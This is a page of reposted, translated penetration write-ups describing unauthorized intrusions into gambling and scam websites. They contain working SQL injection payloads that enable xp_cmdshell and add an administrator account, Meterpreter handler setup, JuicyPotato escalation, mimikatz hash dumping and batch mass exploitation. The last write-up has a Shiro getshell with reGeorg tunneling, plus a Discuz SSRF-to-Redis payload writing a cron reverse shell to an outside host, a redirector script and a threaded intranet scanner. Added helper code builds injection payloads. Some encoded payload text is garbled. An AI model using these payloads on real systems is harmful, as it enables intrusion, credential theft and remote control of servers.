Everything posted by UKhackteam
-
Title: A gambling site in practice - from weak password to privilege escalation

0x00 Preface

Our small team infiltrated a BC (gambling) site that we found by chance. From an sqlmap run with no echo, to getting a CS beacon online, to working together with MSF, to escalating with a Potato exploit, to finally getting SYSTEM: here is a record of the whole penetration process.

0x01 SQL injection in the login box

The login box had nothing special to say about it, so I tried sqlmap first. Capture the login request in Burp, save it to a file and run it directly:

    python3 sqlmap.py -r '2.txt'

There is both blind and stacked injection. See whether sqlmap can give us a shell:

    python3 sqlmap.py -r '2.txt' --os-shell

Visibly unsuccessful: the prompt says xp_cmdshell is not enabled. Since stacked injection was found in the earlier scan, try using the stored procedure to enable xp_cmdshell. Payload:

    userName=admin';exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;WAITFOR DELAY '0:0:15'-- &password=123

A 15-second delay means execution succeeded (if there were no stacked injection, each statement could be split out and sent one at a time; the effect should in theory be the same).

While at it, use xp_cmdshell to add an account and give it rights. Construct the payload (note that the password should not be too simple: Windows seems to have password strength requirements, and a password that is too simple may fail):

    userName=admin';exec xp_cmdshell 'net user Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master..xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15'-- &password=123

An nmap scan shows the target has 3389 open, so connect directly with mstsc.exe: not connected. Run --os-shell again and find that commands run by absolute path, which is a good sign. The shell pops successfully. Because it is blind injection, commands such as whoami give no echo, so I went straight to a CS shellcode. The generated shellcode is pasted directly into the os-shell and sent with Enter. The CS beacon came online soon after. Quick, call over a few unscrupulous friends to come online and play.

0x02 Information collection

tasklist to check the processes: Alibaba Cloud Shield is present, which makes things a bit harder. systeminfo to see what is there: an Alibaba Cloud server, Windows Server 2008 R2 with 75 patches. whoami: it is estimated that the database account has been de-privileged, and the service permissions are very low. Tried to upload an MS16-032 exp, and the upload failed outright. At this point the role of CS is extremely limited; CS was just for fun, and now it depends on MSF.

0x03 Using frp to link the CS server to an MSF attack

Open a listener on CS. Modify the frp configuration file; after saving it, start frp in the frp folder:

    ./frpc -c frpc.ini

Turn on msf and start the handler:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    set LHOST 127.0.0.1
    set LPORT 9996
    run

Here you can see that MSF is listening. Go back to CS, right-click the host and choose to spawn a session, picking the listener you just created. Back in msf, the session came back very quickly. Let's drop into the shell and take a look. It has in fact taken over the CS beacon, and it still has low permissions.

0x04 Upload the Potato exp and escalate

Prepare a Potato exp locally (note that I add extra backslashes to the Windows path; they are not strictly required, but after trying a few machines I found the success rate is higher with them, and I don't know the reason):

    upload /root/EXP/JuicyPotato/potato.exe C:\\Users\\Public

Browsing the target's files in CS shows the upload succeeded. Then enter that folder on the target and start preparing for escalation:

    cd C:\\Users\\Public
    use incognito
    execute -cH -f ./potato.exe
    list_tokens -u

Copy the administrator's token:

    impersonate_token 'administrator'

Finally, check whether the escalation succeeded.

0x05 Dumping password hashes with mimikatz

First escalate with getsystem. Tried to dump directly; no luck, so I have to use mimikatz:

    load mimikatz
    mimikatz_command -f samdump::hashes

You can also use MSF's built-in module (a little slower than mimikatz):

    run post/windows/gather/smart_hashdump

Then throw the hash at CMD5 to crack it. If it is a weak password you can recover the account password. This time we were lucky: it was a weak password and it was cracked directly. Then mstsc.exe connected and we successfully landed on the desktop.

0x06 Information collection to expand the attack surface

After getting the highest privilege on the target, try to find other similar sites through information collection to carry out batch attacks. @crow extracted the CMS fingerprint of the website and wrote a fofa script to scan in batches, and ended up with 1900+ sites. However, since BC sites often "fire a shot and change places", most of these domains are no longer available, so their liveness had to be confirmed again. Using a script, over 100 surviving domains were obtained in the end. When accessing the vulnerable URLs in batches, the saved request was used to fire requests in batches from a multi-threaded script:

    python3 sqlmap.py -r '{0}' --dbms='Microsoft SQL Server' --batch --os-shell

This finally gives a set of hosts where an os-shell pops; then the shellcode is injected manually, and in the end a large number of hosts came online.

0x07 Visiting the back end

Log in to the website back end with the administrator account and password found in the database to take a look: 20 people recharged more than 800,000. There is even someone whose game account is called "Bright Future", not knowing that online gambling is destroying their own future! I advise everyone to stay away from gambling, and I hope the gamblers who are trapped turn back!

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=MzI3NjA4MjMyMw==&mid=2647772541&idx=1&sn=646e732c96521e0d4d9d109426c4dc4d&chksm=f35f9681c4281f97b4c46cd95f858dc90481706a6db607fcfd6596a15745ca10c88ba83e0e9f&scene=21#wechat_redirect
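As an added example (not code from the original post), the following Python assembles the stacked-query payloads used above, both as one request and as one statement per request, and implements the timing oracle the post relies on: a WAITFOR DELAY is only counted as proof of execution when the round trip exceeds a measured baseline plus most of the injected delay, so network jitter is not mistaken for a sleep. The field names userName/password and the value admin mirror the post; the request sender is an assumption and is supplied by the caller.

```python
import time
import urllib.parse

# Statements needed to turn on xp_cmdshell on SQL Server. Order matters:
# 'show advanced options' must be reconfigured before 'xp_cmdshell' is visible.
ENABLE_XP_CMDSHELL = [
    "exec sp_configure 'show advanced options',1",
    "RECONFIGURE",
    "exec sp_configure 'xp_cmdshell',1",
    "RECONFIGURE",
]


def stacked_body(statements, delay_s=15, param="userName", value="admin", extra=None):
    """Form-urlencoded POST body that closes the injected string literal,
    stacks the statements and ends with WAITFOR DELAY as a time oracle.
    The parameter names and the trailing password field are assumptions."""
    extra = extra if extra is not None else {"password": "123"}
    sql = ";".join(list(statements) + [f"WAITFOR DELAY '0:0:{int(delay_s)}'"])
    fields = {param: f"{value}';{sql}-- "}
    fields.update(extra)
    # urlencode percent-encodes ' ; , and : so the body survives the request parser
    return urllib.parse.urlencode(fields)


def one_per_request(statements, delay_s=15, **kw):
    """Same statements, one per request, each with its own delay, so a
    statement that fails (for example one blocked by a WAF) is visible alone."""
    return [stacked_body([s], delay_s, **kw) for s in statements]


def baseline(send, body, samples=3):
    """Median round trip of a benign request, used to calibrate the oracle."""
    times = []
    for _ in range(samples):
        t0 = time.monotonic()
        send(body)
        times.append(time.monotonic() - t0)
    times.sort()
    return times[len(times) // 2]


def time_oracle(send, body, delay_s, baseline_s=0.0, samples=1):
    """True only if every sample of send(body) took at least the baseline
    plus 80% of the injected delay; one fast answer means the sleep did not run."""
    for _ in range(samples):
        t0 = time.monotonic()
        send(body)
        if time.monotonic() - t0 < baseline_s + 0.8 * delay_s:
            return False
    return True


if __name__ == "__main__":
    print(stacked_body(ENABLE_XP_CMDSHELL))
    for body in one_per_request(ENABLE_XP_CMDSHELL):
        print(body)
```

Use baseline() with a harmless body first, then pass its result as baseline_s; with samples=2 the oracle demands two consecutive slow responses before reporting success.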
-
Title: Record of the actual penetration of the scam behind being cheated out of my Huabei

0X00 Cause of the incident

I ran into a "prepay 3999 of phone credit and get a tablet" deal and was tricked: Alipay was operated on the spot, the money was cashed out and transferred, and my Huabei credit was taken. When I got home I felt something was wrong and regretted it more and more. I searched online for this kind of activity and found many cases exactly the same. The more I read, the angrier I got. Worst of all, the tablet they gave was worth just over 800 yuan, not worth the prepaid credit, and it was actually stuck, so I decided to dig deeper.

0X01 Information collection

Copy the short link from the verification text message into the browser and resolve the URL xx.xxxx.xx.xx. Clearly this is not under the official mobile operator. I looked up the URL with a webmaster tool: it resolves to Alibaba Cloud with no CDN enabled. The domain holder is a technology company in Guangdong, and the domain expires in November this year. Searching for the company turned up the words "operation abnormal". My several thousand of phone credit must be long gone. Scan the domain with nmap for all ports to see which services are open and start from there:

    nmap -p 1-65535 xx.xxxx.xx

Only ports 80 and 22 are open. The only useful information is that port 22 tells us the other side is a Linux server. Accessing the web service on port 80 gives the same page that the short link in the text message jumps to. Its URL is /admin/user/login, an obvious user login page. As everyone knows, admin means management. Intuition made me strip the path back layer by layer, and it turned out that admin/login is the merchant management login page.

0X02 Vulnerability mining

Two login pages found so far. The back-end login has no CAPTCHA, so brute-forcing is possible, but only if you know the merchant's mobile number. First log in normally as my own user to see if there is anything usable. The functions are very simple and there is nothing usable: the avatar cannot be edited or uploaded, and the page only shows the total phone credit. I guess they only use such a platform to display a number to placate consumers for the first few months. I logged out and used Burp to capture a packet and analyze the transmitted data: enter the correct mobile number, image CAPTCHA and SMS code with capture on, and you can see that all parameters are transmitted in plain text and all the codes are correct. If I replace the mobile number with another user's, can I get horizontal privilege escalation? Replacing the mobile number logged in as the other user successfully: horizontal privilege escalation. Same personal center, same lack of anything useful. Switch to the back-end login box. Without further ado, capture a login POST request with Burp, save it to a local txt file and run it with sqlmap; you may get an unexpected gain. Because it is an Alibaba Cloud server and running from my own machine is 100% intercepted, I chose to run from an Alibaba Cloud server like theirs. Username, password and rememberMe: no injection. Fine, capture and resend a packet to see the response data. You can see that the account content is output directly into the value attribute. Construct an XSS payload to close the attribute and inject:

    "><script>alert(/xss/)</script>

Resend it, and it is a reflected XSS.

0X03 Getshell

The two holes found so far were too useless, and I was temporarily out of ideas. Going back over the captured packets, I had not paid much attention to the response packets, and there I found rememberMe=deleteMe, the signature of the Shiro deserialization vulnerability. Just grab an exp; the exp checks the source and fills in a static file of the website for detection. You can see the command execution box is enabled, which proves the vulnerability exists (if it were not, the box cannot be typed in). In addition, a 5663.js verification file is generated under the /css directory, and accessing it confirms that writing a file works. With the file written, write a shell for Behinder (Ice Scorpion) to connect to, and run whoami to see the current privilege: the Linux environment is root straight away, which saves the trouble of escalation. With root, and with port 22 open to the public, a key could be dropped to log in directly without a password. But considering that a remote login to an Alibaba Cloud server triggers a text message reminder, which is too noisy, this was not done. We continued digging for useful information and after a long search found a database configuration file. The database address is 172.xx.xx.xx (the masters are skilled: even the intranet address is redacted, to be on the safe side). You can tell at a glance that this is the intranet database. I needed to forward it through a proxy to connect: Behinder has a SOCKS proxy that, together with Proxifier, lets Navicat Premium tunnel into the intranet database. After configuring Proxifier and adding the program, the connection was attempted repeatedly but kept failing with data exceptions, most of them intercepted. I stepped on a lot of pitfalls in intranet proxying; in short I am still not experienced enough. Other masters suggested adminer.php (thanks @Uncia). Adminer is really good, lightweight and convenient: just upload it to the web directory. But the environment is Java and only runs jsp, while adminer is only available as php.

0X04 Intranet proxy

Since adminer was not an option and the Behinder proxy would not work, we set up a proxy tunnel instead, stepping on a lot of pitfalls trying reDuh and Tunna: either no traffic or an immediate disconnect. I don't know whether I was doing it wrong or the environment restricted it. Finally I found the reGeorg tool on GitHub. reGeorg can be said to be an upgraded version of reDuh. It uses a webshell on the target to tunnel ports on the intranet server over HTTP/HTTPS back to the local machine, forming a loop that lets you connect to ports that are only open internally or restricted by port policy; in other words it creates a SOCKS proxy through the webshell for intranet penetration. Because the environment is Java, upload the .jsp forwarding file to the website directory. After uploading, accessing the script shows "Georg says, 'All seems fine'": the proxy works. Then run:

    python2 reGeorgSocksProxy.py -p 9999 -u http://xx.xxxx.xx/tunnel.jsp

which also prints "Georg says, 'All seems fine'" in the terminal. Open Proxifier, configure local 127.0.0.1 port 9999, then in the proxy rules add the Navicat program and set the Direct action for everything else so that only Navicat traffic goes through. After the configuration, right-click Navicat to open it through the Proxifier local proxy. The link is stable and the Python window shows traffic (remember: do not close that window while proxying).

0X05 The real scam

With the database connected, look at the accounts in the membership table and filter the name field for your own name. Sure enough, the data is there and its timestamp matches the time I was tricked. How to prove it is a scam? Very simple. The first batch of users in the table dates from May 2019, about a year ago. Using the earlier horizontal privilege escalation hole, I picked a random "lucky" player with a 2019 account and logged in to look at the cash-back record. A year has passed and there is only the very first cash-back. In the following months they fob off consumers with various excuses; in short it is always the consumers who lose.

0X06 Closing words

As for why I wrote this: I am also a victim, and I want to analyze it so that everyone can understand this scheme more intuitively and fewer people get tricked. When you sign up they will tell you this is an activity authorized by the mobile operator (they told me so). But as you can see, it has nothing to do with the operator at all. It is just a platform they built themselves, and the balance inside is just a number displayed on a platform to reassure you. As for the few hundred that arrive in the first month, that is just a manual recharge of a few hundred out of the thousands they took from you. Enough said; for the next year I will be eating dirt to pay back Huabei. There are probably more tricks in the merchant login system, but as far as the penetration goes, my purpose was to prove whether this is a scam. Since it clearly is one, there is no need to go deeper. The security confrontation we do is like a war without gunpowder smoke. Besides winning or losing, a war also has the difference between justice and injustice. The only difference is that we must always stand on the side of justice and explore the principle of the vulnerability without causing harm.

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486245&idx=1&sn=ebfcf540266643c0d618e5cd47396474&chksm=ce67a1bcf91028aa09435781e951926067dcf41532dacf9f6d3b522ca2df1be8a3c8551c1672&scene=21#wechat_redirect
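The rememberMe=deleteMe clue in 0X03 is worth turning into a repeatable check. As an added example (not code from the original post or from Apache Shiro), the Python below builds the probe request (a deliberately invalid rememberMe cookie, which Shiro's CookieRememberMeManager cannot decrypt and therefore clears with deleteMe), parses the raw response headers, and reports the fingerprint. It is a fingerprint only: it says the cookie is handled by Shiro, not that the default or a known AES key is in use, which is what the exploit tool's key check establishes. The two sample responses and the host name are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample responses to a request carrying "Cookie: rememberMe=1".
SAMPLE_SHIRO_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Set-Cookie: JSESSIONID=0E7F1A2B3C4D5E6F; Path=/; HttpOnly\r\n"
    "Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)
SAMPLE_PLAIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Set-Cookie: JSESSIONID=0E7F1A2B3C4D5E6F; Path=/; HttpOnly\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)


def probe_request(host: str, path: str = "/", cookie_value: str = "1") -> str:
    """Raw GET with a junk rememberMe cookie. A Shiro app that fails to
    decrypt it answers with Set-Cookie: rememberMe=deleteMe."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: rememberMe={cookie_value}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """(name, value) pairs from a raw response, keeping duplicate headers
    such as several Set-Cookie lines; names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def set_cookies(raw: str) -> Dict[str, str]:
    """Cookie name -> value taken from every Set-Cookie header."""
    out = {}
    for name, value in parse_headers(raw):
        if name == "set-cookie":
            m = re.match(r"([^=;\s]+)=([^;]*)", value)
            if m:
                out[m.group(1)] = m.group(2)
    return out


def shiro_fingerprint(raw: str) -> Optional[str]:
    """Evidence string when the response looks like Shiro, else None.
    Presence of the framework only; exploitability depends on the AES key."""
    if set_cookies(raw).get("rememberMe") == "deleteMe":
        return "Set-Cookie: rememberMe=deleteMe"
    return None


if __name__ == "__main__":
    print(probe_request("xx.xxxx.xx", "/admin/login"))
    print(shiro_fingerprint(SAMPLE_SHIRO_RESPONSE))
    print(shiro_fingerprint(SAMPLE_PLAIN_RESPONSE))
```

Feed the output of probe_request() to a socket of your own and pass the bytes you read back, decoded, to shiro_fingerprint(); a None result after a request that did carry the rememberMe cookie is a reasonably strong negative.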
-
Title: Record of a penetration of a BC promotion site

0x00 Information collection

A friend gave me a website, considered a relatively large BC site. I looked at the main site and there was no entrance, so I switched to one of its promotion platforms. First scan the directory roughly, hoping to see something useful. Here I can recommend an interface to quickly and roughly check a site's important files, https://scan.top15.cn/web/infoleak, for example whether the website's source code has been packed up. Obviously I did not find that; here are the scan results. config.inc.php should, going by experience, be the database configuration file, but its size is 0B, so I tentatively accessed it. As expected, no access: 403. Still, going by experience, I scanned again in case there was an fck editor. Unfortunately nothing was found. /index.php/login/ is only 2kb, not a back end at all, a bit disappointing. There is only one web asset on the port, so I could only look at the website's functions. I clicked on the query function and hoped to find injection there.

0x01 Back-end injection

Sure enough there is injection, and the rest is to look for the back end. View the current database:

    and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--

Here I will note a pitfall. This is the complete payload:

    account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--('

At first my payload was:

    account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

and it never produced data; I thought there was a damn filter and fuzzed one by one. After thinking about whether closing the comment with (' would help, I appended it. Sure enough, the data comes out after the closing. Then I used sqlmap to dump data, but unexpectedly it couldn't get anything out. Only by reconstructing the sqlmap statement myself:

    python2 sqlmap.py -r 1.txt --prefix "')" --suffix "--('" --level 3 --tamper=space2plus --skip-urlencode

did it finally run. Looking at the payload afterwards: every time it ran, spaces were encoded to %20, and after URL encoding the payload no longer took effect, so I used the --skip-urlencode parameter.

0x02 Injection point

Another surprise: I looked at the privileges, and it was true that after so many MySQL injections this one finally had relatively high permission. I didn't even read the account and password; I just dumped the absolute path through an error. Isn't this --os-shell? When I checked the payload I found hws (Huweishen), and felt it was not going to be easy, brothers. Sure enough, if you can't write, you can't write, even with --hex. Fine, --sql-shell. Writing with stacking: although I knew it probably wouldn't write, I still had to try; penetration is damn metaphysics. I checked the privilege, it was not null, which gave me a little hope. Write a txt first to see:

    select 1 into outfile 'D:/wwwroot/wnshd.com_22fqiz/web/1.txt'

Then I checked on the website and it wasn't written; it is really difficult. All that is left is --file-write, which was not a sure thing either, and it still wasn't taken down. Helpless, I could only check the back-end account password. After collecting the account and password I went looking for the back end, but unfortunately still couldn't find it, almost despairing. The site has been handed to you, so why can't you get it? I felt it was a problem with sqlmap and redid the steps above. I understand that sqlmap may lie to you, but hws doesn't: if it can't be written, it just can't. Forget it, change the idea: isn't the directory leaked? wolsoowpppps; I went back and checked it, and nothing unexpected: 403. wolsoowpppps/admin, wolsoowpppps/login, nothing. dirsearch scanned, still nothing.

0x03 Failed to write a shell

Is it not the path web/wolsoowpppps? Could the absolute path be wrong? I visited it and also got 403, which only means this is a directory that hasn't been scanned. Damn, I feel there is something here. As a result, I scanned for images and the posting stopped, and still nothing. Ha ha ha. Wasted joy. But I always felt there was something off with this wolsoowppps directory. I fuzzed it, fuzzed my way out to web, and then scanned web. Oh my: temp.php. Visit it: a "big horse" (full-featured webshell). Isn't this a good thing to get? Then brute-force it, finally brute-force in, upload an AntSword one-liner, and take it down. This big horse looks very familiar. But hws is really powerful: commands cannot be executed, and the plug-in and .so methods are not found. Thanks to Brother Huang here: the Huweishen he mentioned is mainly for asp, so just send a Behinder (Ice Scorpion) shell. Then I thought of a lot of solutions, but I couldn't get this permission down. I believe the bosses on xz should know; let me describe the situation: currently there are only view and modify permissions on drive D, and exe cannot be executed, which means the MS series cannot be used; the Potato family can't be uploaded; IIS can't be taken instantly; the AV is Huorong, Huweishen and Safedog. CS comes online, but executing the dll and mshta gets stuck. I don't know how to escalate for now. I want to keep expanding, but I have little experience with escalation on promotion sites. I hope the experts will give this cousin some ideas.

0x04 Taking the back end

Finally, I thought about how the big horse was uploaded. The other party probably also started from injection, found an XSS in one place (I also found it, but since customer service went offline in October the site changed, so my XSS could not be fired), found the back end, and since it is a tp3.2.3 site, back-end RCE (tp3.2.3 cache getshell) led to the big horse. This is the location of the XSS; this is the back end. Although this site's take-down was rough, the idea was very simple, so I should learn more.

Reprinted from the original links: https://mp.weixin.qq.com/s/qNdLNaPNK_485uAPILQXRQ and https://xz.aliyun.com/t/8491
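The prefix/suffix and URL-encoding pitfalls in 0x01 are easier to see with the payload assembled by hand. As an added example (not code from the original post or from sqlmap), the Python below builds the extractvalue() payload around the post's prefix ') and suffix --(', keeps spaces as + (the same effect as --tamper=space2plus with --skip-urlencode), and adds what a manual dump needs next: because extractvalue() only reports about 30 characters of the bad XPath back, a long value is pulled in substr() windows and the pieces are parsed out of MySQL's "XPATH syntax error" text. The sample error responses are constructed; nothing here contacts a server.

```python
import re

PREFIX = "')"      # closes the ('...') context the post found
SUFFIX = "--('"    # comments out the rest; the trailing (' is what made the post's query work
# MySQL echoes the invalid XPath back; the 0x7e ('~') markers delimit the leak.
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*?)~?'")


def error_payload(subquery, prefix=PREFIX, suffix=SUFFIX, space="+"):
    """Error-based payload around a MySQL subquery. Spaces become '+' by
    default; with space='%20' you get the form that stopped working in the post."""
    sql = f"{prefix} and (extractvalue(1,concat(0x7e,({subquery}),0x7e))){suffix}"
    return sql.replace(" ", space)


def chunked_payloads(expr, width=30, chunks=4, **kw):
    """extractvalue() leaks at most 32 characters including the two '~'
    markers, so read a long value in substr() windows of `width`."""
    return [
        error_payload(f"select substr(({expr}),{1 + i * width},{width})", **kw)
        for i in range(chunks)
    ]


def parse_leak(response_text):
    """The leaked substring from one error page, or None if no error was raised."""
    m = XPATH_ERR.search(response_text)
    return m.group(1) if m else None


def reassemble(responses, width=30):
    """Join the windows in order; a window shorter than `width` ends the value."""
    value = ""
    for text in responses:
        part = parse_leak(text)
        if part is None:
            break
        value += part
        if len(part) < width:
            break
    return value


if __name__ == "__main__":
    print(error_payload("select database()"))
    for p in chunked_payloads("select group_concat(table_name) from information_schema.tables "
                              "where table_schema=database()", chunks=2):
        print(p)
```

The window arithmetic is the part people get wrong: with both markers present the usable width is 30, and if the server clips the trailing ~ the regex still accepts the line, which is why the parser treats the closing marker as optional.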
-
Title: Penetration of large spinach website duck neck
You can find that the jsp and php suffix coexist when registering the main site. It should be that different routes have reversed different middleware, so no vulnerabilities are found. The forum is Discuz! X3.2 Discuz emergency room was found. admin.php 403, uc_server and emergency room have no weak passwords. In 《渗透某盗版游戏网站》, I introduced what vulnerabilities are in the Discuz background, so what about the vulnerabilities in the front desk? Mainly there are arbitrary file deletion, SSRF, and uc_server blasting. First, delete any file. POST /home.php?mod=spacecpac=profileop=base birthprovince=./././info.php Then POST file to delete info.php format='https://x.com/home.php?mod=spacecpac=profileop=base'method='POST' enctype='multipart/form-data' input type='file'name='birthprovince' id='file'/input type='text'name='formhash' value='017b5107'/input type='text'name='profilesubmit' value='1'/input type='submit' value='Submit' //Although this vulnerability is not low, it is useless for subsequent penetration. It is difficult for Discuz to install by deleting files. Let's look at SSRF again. /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://qzf9jq.dnslog.cn/1.png[/img]formhash=017b5107 This is an SSRF that does not echo, and can only be judged by time delay. 1. You can directly detect the intranet through http. If the IP survives, it will have a short delay (regardless of whether the port is open or not), and if the IP does not exist, it will have a long delay. 2. The protocol can be changed through 302 jump, and ftp, dict, and gopher can be supported. Third, the port can be detected through the ftp protocol. If the port is open, it will have a long delay and if the port is closed, it will have a short delay. First access my VPS through the http protocol to get the real IP of the forum. 163.*. 
*.35.bc.googleusercontent.com(35.*.*.163) Then try to blindly call the local redis (here to detect the local ports, it is unreasonable, so I directly blindly call it) When the gopher protocol attacks redis locally, it is found that it does not need to declare the length of each line of command string with $. First, see the clear SSRF attack payload /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopherip=127.0.0.1port=6379data=_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * * bash -i /dev/tcp/62.1.1.1/566701\n\n'%0d%0asave%0d%0aquit%0d%0axx=1.png[/img]formhash=017b5107 Then, between 302.php? and data=, you need to encode the url, and all strings from data=to xx=1.png are encoded twice, and then packaged in bp. /forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=127.0.0.1%26port=6379%26data=%25%35%66%25%36%36%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%32%35%25%33%33%25%36%33%25%36%33%25%36%33%25%36%63%25%32%35%25%33% 30%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%65%25%36%36%25%36%25%36%39%25%36%37%25%32%30%25%36%25%36%31%25%37%32%30%25%36%32%25%32%30%25%36%32%66%25%37%36%31%25%37%32%25%32%32%66 %25%37%33%25%37%30%25%36%66%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%36%33%25%36%65%25%32%66%25%36%65%25%32%35%25%36%34%25%32%35%25%33%30%25%36%31%25%36%33%25%36%66%25%36%25%36%25%36%25%36%39%25%36%37%25%32%30%2 5%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25% 
36%31%25%37%33%25%36%35%25%37%34%25%32%30%25%33%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%30%25%32%30%25%36 %32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%66%37%36%25%32%66%25%34%25%36%36%34%25%36%35%25%36%32%66%25%33%31%25%32%66%25%33%31%25%32%66%25%32%65%31%32%65%31%32%6 5%25%33%31%25%32%65%25%33%31%25%32%66%25%33%35%25%33%36%25%33%36%25%33%37%25%32%30%25%33%30%25%33%65%25%32%36%25%33%30%25%33%65%25%32%36%25%33%30%25%33%30%25%36%34%25%32%35%25%33%30%25%33%30%25%33%30%25%36%31% 25%37%33%25%36%31%25%37%36%25%36%35%25%32%35%25%33%30%25%36%34%25%32%35%25%33%30%25%36%31%25%37%31%25%37%35%25%36%39%25%37%34%25%32%35%25%33%30%25%36%31%25%32%36xx=1.png[/img]formhash=017b5107 But it was found that the payload was intercepted by the XSS and SQL injection protection provided by Discuz. Therefore, payload can only be written in VPS. ?php $ip=$_GET['ip']; $port=$_GET['port']; $scheme=$_GET['s']; $data='_flushall%0d%0aconfigset dir /var/spool/cron/%0d%0aconfig set dbfilename root%0d%0aset 0'\n\n*/1 * * * * bash -i /dev/tcp/62.1.1.1 /566701\n\n'%0d%0asave%0d%0aquit%0d%0aquit%0d%0a'; header('Location:$scheme://$ip:$port/$data'); Test whether the redis on VPS can be successful/forum.php?mod=ajaxaction=downremoteimgmessage=[img=1,1]http://62.1.1.1/302.php?s=gopher%26ip=62.1.1.1%26port=6379%26data=1.png[/img]formhash=017b5107 no problem. However, the utilization failed in the actual environment, the reason is uncertain, it is possible to have no redis, lack of redis permissions or have a password. I started writing scripts to detect the intranet, but I didn’t have much hope. It is Google Cloud, and it does not necessarily have an intranet. 
First build a dictionary of candidate intranet gateway addresses (the last octet is fixed at .1):

```python
f = open('ip.txt', 'w')
f.write('127.0.0.1\n')
f.write('localhost\n')
for i in range(1, 256):
    ip = '192.168.' + str(i) + '.1'
    f.write(ip + '\n')
for i in range(16, 32):
    for ii in range(1, 256):
        ip = '172.' + str(i) + '.' + str(ii) + '.1'
        f.write(ip + '\n')
for i in range(1, 256):
    for ii in range(1, 256):
        ip = '10.' + str(i) + '.' + str(ii) + '.1'
        f.write(ip + '\n')
f.close()
```

Then use the response delay to find the live intranet segment. Because a request to an unreachable IP blocks for more than 7 s, the scan has to be multithreaded. Since all that is being detected is whether the IP answers at all, I simply reused the gopher payload for Redis and let it fire directly, in case it happened to hit.

```python
import requests
import threading


def ssrf(i):
    url = ('https://x.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]'
           'http://62.1.1.1/302.php?s=gopher%26ip=' + i + '%26port=6379%26data=1.png[/img]'
           '&formhash=017b5107')
    header = {
        'User-Agent': 'Mozilla/5.0(Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'keep-alive',
    }
    cookie = {
        'PNuE_2132_saltkey': 'vx3wOD3T',
        'PNuE_2132_auth': '8b46%2F9AD2x2XyfyESVQaytdhS%2FVWrzIGQLWCe3IAr6AIwuX8raGrp%2BgRkMv39ylNO2GAIfHep01AGhxApI0OCyXirNKx',
    }
    r = requests.get(url, cookies=cookie, headers=header, allow_redirects=False)
    if r.elapsed.total_seconds() > 6:
        # blocked for the full timeout: nothing answered on this address
        timeout = str(i) + 'port:' + str(r.elapsed.total_seconds())
        print(timeout)
    else:
        # a quick response means the host answered
        timeout = str(i) + 'port:' + str(r.elapsed.total_seconds())
        fo = open('openip.txt', 'a')
        fo.write(str(i) + 'open\n')
        fo.close()
        print(str(i) + 'open')
        print(timeout)


def thread(batch):
    threads = []
    for i in batch:
        th = threading.Thread(target=ssrf, args=(i,))
        threads.append(th)
        th.start()
    for th in threads:
        th.join()


folist = open('ip.txt', 'r')
batch = []
flag = 0
for i in folist.readlines():
    i = i.replace('\n', '')
    if flag < 21:
        batch.append(i)
        flag = flag + 1
    else:
        thread(batch)
        batch = [i]
        flag = 1
if batch:
    thread(batch)
```

